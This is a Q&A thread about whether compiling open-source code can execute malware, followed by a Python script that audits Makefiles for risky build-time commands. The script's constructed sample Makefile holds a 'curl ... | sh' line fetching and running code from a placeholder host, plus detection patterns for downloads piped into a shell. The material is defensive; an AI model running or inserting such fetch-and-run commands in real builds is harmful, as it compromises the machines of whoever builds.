Is it possible for let's say open source programs to install malware at compile time? I'm thinking of C macros or makefile related stuff that will execute evil code at compile time. Or am I safe as long as I don't start running the compiled program?
Upvotes: 4
Views: 5166
Reputation: 132
Not only is it possible for configure or make scripts to install malicious code at compile time, but the compiler or build tools could be modified to inject a backdoor or other malicious code into the compiled binaries. That is, even though the code you're building appears clean, the build tools could 'go rogue' and introduce malicious code.
This concept of malicious compilers was famously presented in a paper titled 'Reflections on Trusting Trust' [1]. Recently, malware was discovered in iOS apps that was injected using this technique by attacking developers' compilers (Xcode) [2].
Bottom line: unless you've written or reviewed every line of code from the project you're building, the tools you're using to build it, and the OS/firmware you're building it on, you can't fully trust it.
[1] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
Upvotes: 6
Reputation: 4439
Consider that the makefile is essentially just a list of commands to run. So take for example the idea that you could distribute malware source code in a makefile project. Then when you build the project, the makefile goes and compiles the malware... and then at the end, executes the newly-compiled malware -- say for example pretending to run a unit test on what you think is not malware.
It's certainly possible.
Upvotes: 2
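Both answers above come down to the same point: `configure` and the makefile are programs, and anything in a recipe runs with your privileges the moment you type `make`. As an added example (not code from the question or either answer), here is a small Python triage script that does the check a practitioner would want before building an untrusted tree: it lists every recipe command a given goal would run, in build order, and flags the pattern the second answer describes (a target that executes a binary the build itself just produced), plus downloads piped into a shell, plus the one case a `make -n` dry run does not protect you from: `$(shell ...)` inside an immediate (`:=`) assignment, or a `!=` shell assignment, which GNU make executes while it is still parsing the file. The Makefile it audits is constructed for this example; `example.invalid`, `gen-build-id.sh` and the target names are placeholders, not taken from any real project.

```python
"""Triage a Makefile for commands that execute at build (or even parse) time."""
import re

# Constructed sample Makefile (not from any real project) of the shape the
# answer describes: an ordinary-looking build whose "check" target runs a
# helper binary it just compiled and also pipes a download into a shell.
SAMPLE_MAKEFILE = """\
CC := cc
# $(shell ...) in an immediate assignment runs when make parses the file,
# before any target is built, so even `make -n` triggers it.
BUILD_ID := $(shell sh ./scripts/gen-build-id.sh)

all: libfoo.a

libfoo.a: foo.o
\tar rcs $@ $^

foo.o: foo.c
\t$(CC) -c foo.c -o foo.o

test-helper: test-helper.c
\t$(CC) test-helper.c -o test-helper

check: libfoo.a test-helper
\t./test-helper
\tcurl -s https://example.invalid/telemetry | sh

clean:
\trm -f *.o libfoo.a test-helper
"""

TARGET_RE = re.compile(r'^([^\t#][^:=]*?)\s*:(?!=)\s*(.*)$')
ASSIGN_RE = re.compile(r'^\s*[A-Za-z_][A-Za-z0-9_]*\s*(::?=|!=|=)\s*(.*)$')
NETWORK_RE = re.compile(r'\b(curl|wget)\b')
PIPE_TO_SHELL_RE = re.compile(r'\|\s*(ba|z|da)?sh\b')


def parse_makefile(text):
    """Return (targets, assignments).

    targets maps a target name to {'prereqs': [...], 'recipe': [...]};
    assignments is a list of (operator, line). Deliberately approximate:
    no `include`, no backslash continuations, no pattern rules.
    """
    targets, assignments, current = {}, [], None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith('#'):
            continue                      # blank/comment lines do not end a recipe
        if raw.startswith('\t'):          # tab-indented line: recipe of the last rule
            if current:
                for name in current:
                    targets[name]['recipe'].append(raw[1:].strip())
            continue
        m = ASSIGN_RE.match(raw)
        if m:
            assignments.append((m.group(1), raw.strip()))
            current = None
            continue
        m = TARGET_RE.match(raw)
        if m:
            names, prereqs = m.group(1).split(), m.group(2).split()
            for name in names:            # "a b: c" defines two targets
                targets.setdefault(name, {'prereqs': [], 'recipe': []})
                targets[name]['prereqs'].extend(prereqs)
            current = names
            continue
        current = None
    return targets, assignments


def commands_for(targets, goal, _seen=None):
    """(target, command) pairs make would run for `goal`, in build order.

    Prerequisites are visited depth-first, left to right, as make does;
    names with no rule (plain sources such as foo.c) contribute nothing.
    """
    seen = _seen if _seen is not None else set()
    if goal in seen or goal not in targets:
        return []
    seen.add(goal)
    out = []
    for dep in targets[goal]['prereqs']:
        out.extend(commands_for(targets, dep, seen))
    out.extend((goal, cmd) for cmd in targets[goal]['recipe'])
    return out


def audit_makefile(text):
    """Flag parse-time execution, self-execution of built artifacts,
    network fetches, and downloads piped into a shell."""
    targets, assignments = parse_makefile(text)
    findings = {'targets': targets, 'parse_time': [],
                'runs_built_artifact': [], 'network': [], 'pipe_to_shell': []}
    # `!=` and `$(shell ...)` under `:=`/`::=` run while make reads the file.
    for op, line in assignments:
        if op == '!=' or (op in (':=', '::=') and '$(shell' in line):
            findings['parse_time'].append(line)
    for name, rule in targets.items():
        for cmd in rule['recipe']:
            words = cmd.lstrip('@-+ ').split()   # drop make's recipe prefixes
            head = words[0] if words else ''
            head = head[2:] if head.startswith('./') else head
            if head in targets:                  # runs something this build produces
                findings['runs_built_artifact'].append((name, cmd))
            if NETWORK_RE.search(cmd):
                findings['network'].append((name, cmd))
            if PIPE_TO_SHELL_RE.search(cmd):
                findings['pipe_to_shell'].append((name, cmd))
    return findings


if __name__ == '__main__':
    report = audit_makefile(SAMPLE_MAKEFILE)
    print("commands `make check` would run:")
    for tgt, cmd in commands_for(report['targets'], 'check'):
        print(f"  [{tgt}] {cmd}")
    for key in ('parse_time', 'runs_built_artifact', 'network', 'pipe_to_shell'):
        for item in report[key]:
            print(f"{key}: {item}")
```

Against the constructed sample, `commands_for(..., 'check')` shows that `make check` first compiles `test-helper` and then runs it, and the audit flags that line, the `curl ... | sh` line, and the `BUILD_ID :=` assignment that fires before any target is built. The regex parser is a triage aid, not a Makefile implementation; for the authoritative list of recipe commands run `make -n <goal>` on the tree, remembering that `-n` still evaluates `$(shell ...)` in immediate assignments, so read the file first.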